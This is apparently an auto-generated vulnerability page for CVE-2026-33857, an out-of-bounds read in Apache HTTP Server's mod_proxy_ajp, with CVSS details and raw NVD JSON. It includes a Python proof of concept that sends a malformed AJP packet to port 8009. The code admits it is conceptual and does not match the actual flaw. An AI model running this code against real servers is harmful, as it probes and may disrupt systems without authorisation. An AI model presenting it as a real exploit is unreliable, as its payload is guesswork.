Security Vulnerability Report
中文
CVE-2026-33857 CVSS 5.3 MEDIUM

CVE-2026-33857

Published: 2026-05-04 14:16:33
Last Modified: 2026-05-04 20:26:20

Description

Out-of-bounds Read vulnerability in mod_proxy_ajp of Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* - VULNERABLE
Apache HTTP Server <= 2.4.66

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # Target configuration TARGET_HOST = "127.0.0.1" TARGET_PORT = 8009 # Default AJP port def create_malformed_ajp_packet(): """ Creates a malformed AJP packet to trigger the Out-of-bounds Read. Note: This is a conceptual PoC. Adjust payload based on specific vulnerability details. """ magic = b'\x12\x34' # Simulating a packet with a length that might cause OOB read # Example: Sending a forward request with invalid attributes data = b'\x02\x02\x00\x0C\x03\x00\x0F localhost\x00\x0F /index.jsp\x00\x00' # Intentionally setting a length larger than actual data to test bounds length = struct.pack('>H', 0xFFFF) return magic + length + data def send_poc(): try: print(f"[*] Sending PoC to {TARGET_HOST}:{TARGET_PORT}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_HOST, TARGET_PORT)) payload = create_malformed_ajp_packet() s.send(payload) # Wait for response or timeout s.settimeout(2) response = s.recv(4096) if response: print("[+] Received response from server.") else: print("[-] No response received (possible crash or hang).") s.close() print("[*] PoC execution finished.") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": send_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33857", "sourceIdentifier": "[email protected]", "published": "2026-05-04T14:16:33.253", "lastModified": "2026-05-04T20:26:20.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds Read vulnerability in mod_proxy_ajp of \n\nApache HTTP Server.\n\nThis issue affects Apache HTTP Server: through 2.4.66.\n\nUsers are recommended to upgrade to version 2.4.67, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.67", "matchCriteriaId": "8FF781BA-CF81-400B-A155-4DAE0BD856EE"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/04/15", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}